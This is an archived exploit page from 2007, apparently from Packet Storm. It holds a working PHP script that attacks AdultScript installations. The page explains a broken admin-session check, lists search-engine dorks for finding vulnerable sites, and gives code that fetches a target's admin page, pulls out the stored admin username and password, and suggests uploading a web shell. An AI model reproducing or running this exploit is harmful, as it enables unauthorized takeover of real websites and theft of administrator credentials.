what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

adult-access.txt

adult-access.txt
Posted Dec 13, 2007
Authored by Liz0ziM | Site biyo.tk

Adult Script unauthorized administrative access exploit.

tags | exploit
SHA-256 | 40ee0f22dece88845192adbb71ceb8e17056522e2ce13f53fabe330bdc7b64be

adult-access.txt

Change Mirror Download
<? ob_implicit_flush(true); ?>
<title>Adult Script Unauthorized Administrative Access Exploit</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}
a:link {
color: #999999;
text-decoration: none;
font-weight: bold;
background-color:#000000;
}
a:visited {
color: #999999;
text-decoration: none;
font-weight: bold;
background-color:#000000;
}
</style><br>

<h3>Adult Script Unauthorized Administrative Access Exploit</h3><br>
Exploit Coded By Liz0ziM From <a href="http://www.biyofrm.com">BiyoSecurityTeam</a><br>
Greetz My all friend and BiyoSecurityTeam User..
<br>
Software site: http://www.adultscript.net/<br>
Demo: http://www.adultscript.net/demo/<br>

Vulnerable code in <b>admin/administrator.php</b> near lines 5-8</b>

<pre>
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me :D
}
</pre>
<br>
<b>Dork</b>:<br>
inurl:submit-user-link.html<br>
inurl:video-listing-cat<br>
inurl:hosted-videos<br>
inurl:porn-listing-cat<br>
"Powered By AdultScript.NET"<br>
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"<br>
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'">
<input name="yolla" type="submit" value="Send">
</form>

<br>
<?php
function dosya_indir($liz0){


$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $liz0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch);
curl_close($ch);

return $veri;

}

$desen='|value="(.*)"|';

if($_POST[yolla])
{
$adres=$_POST[adres];

if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'BoĆ¾ Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);

if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful <br>";
preg_match_all($desen,$kaynak,$sonuc);
echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
echo "Exploit Has Been Failed! <br>";
}


}
?>

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close